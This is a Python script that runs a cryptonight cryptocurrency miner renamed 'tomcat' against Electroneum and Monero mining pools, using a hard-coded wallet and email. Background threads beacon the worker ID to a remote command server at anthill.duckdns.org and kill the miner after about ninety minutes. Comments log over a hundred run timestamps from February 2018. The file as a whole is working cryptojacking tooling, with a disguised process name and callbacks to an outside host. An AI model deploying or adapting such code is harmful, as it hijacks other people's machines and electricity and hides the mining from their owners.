import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:05.167745
#2018-02-17 16:53:01.508889
#2018-02-17 18:41:07.068357
#2018-02-17 20:29:04.810966
#2018-02-17 22:15:06.715900
#2018-02-17 23:59:06.583497
#2018-02-18 01:50:04.049637
#2018-02-18 03:37:05.381185
#2018-02-18 05:25:07.297597
#2018-02-18 07:17:07.467956
#2018-02-18 09:04:03.260701
#2018-02-18 10:51:07.298683
#2018-02-18 12:37:06.338464
#2018-02-18 14:23:06.405702
#2018-02-18 16:14:06.228928
#2018-02-18 18:02:03.444483
#2018-02-18 19:49:01.498212
#2018-02-18 21:36:04.457487
#2018-02-18 23:24:06.841283
#2018-02-19 01:11:01.728201
#2018-02-19 02:57:06.179863
#2018-02-19 04:44:04.206575
#2018-02-19 06:27:03.702568
#2018-02-19 08:17:07.219858
#2018-02-19 10:06:05.665668
#2018-02-19 11:55:09.171709
#2018-02-19 13:42:09.235929
#2018-02-19 15:32:09.416567
#2018-02-19 17:21:01.798662
#2018-02-19 19:08:06.801859
#2018-02-19 20:53:06.382280
#2018-02-19 22:42:07.540471
#2018-02-20 00:25:07.639630
#2018-02-20 02:13:05.503558
#2018-02-20 04:04:01.439917
#2018-02-20 05:47:02.111219
#2018-02-20 07:34:02.020168
#2018-02-20 09:18:03.992488
#2018-02-20 11:02:06.214277
#2018-02-20 12:48:09.604108
#2018-02-20 14:32:06.472566
#2018-02-20 16:18:01.805672
#2018-02-20 18:04:13.799313
#2018-02-20 19:58:05.093198
#2018-02-20 21:45:06.038750
#2018-02-20 23:27:07.649195
#2018-02-21 01:12:01.847587
#2018-02-21 02:59:02.212423
#2018-02-21 04:47:07.901519
#2018-02-21 06:35:08.157167
#2018-02-21 08:22:07.891990
#2018-02-21 10:08:07.106214
#2018-02-21 11:56:07.280757
#2018-02-21 13:46:01.663600
#2018-02-21 15:34:05.654977
#2018-02-21 17:23:07.604829
#2018-02-21 19:11:01.772045
#2018-02-21 20:59:08.290483
#2018-02-21 22:46:05.848118
#2018-02-22 00:38:01.531036
#2018-02-22 02:25:08.598051
#2018-02-22 04:12:01.441539
#2018-02-22 05:57:04.872702
#2018-02-22 07:43:07.298122
#2018-02-22 09:32:01.905763
#2018-02-22 11:17:05.877164
#2018-02-22 13:04:07.621541
#2018-02-22 14:51:09.321732
#2018-02-22 16:38:05.523624
#2018-02-22 18:23:07.227493
#2018-02-22 20:18:01.477940
#2018-02-22 22:04:06.360489
#2018-02-22 23:50:05.998634
#2018-02-23 01:37:05.771467
#2018-02-23 03:26:06.486727
#2018-02-23 05:13:04.660359
#2018-02-23 06:58:02.088917
#2018-02-23 08:47:05.688163
#2018-02-23 11:01:04.252118
#2018-02-23 12:56:04.061690
#2018-02-23 14:41:04.162693
#2018-02-23 16:31:05.138056
#2018-02-23 18:17:04.860418
#2018-02-23 20:02:02.254630
#2018-02-23 21:45:09.882070
#2018-02-23 23:40:07.439929
#2018-02-24 01:31:05.463674
#2018-02-24 03:21:04.362258
#2018-02-24 05:05:08.066114
#2018-02-24 06:55:07.470240
#2018-02-24 08:44:06.187407
#2018-02-24 10:39:04.049597
#2018-02-24 12:25:07.473682
#2018-02-24 14:17:05.366055
#2018-02-24 16:03:05.533713
#2018-02-24 17:55:07.678637
#2018-02-24 19:42:02.205570
#2018-02-24 21:28:04.409981
#2018-02-25 00:12:02.142182
#2018-02-25 03:21:07.045909
#2018-02-25 07:02:06.096226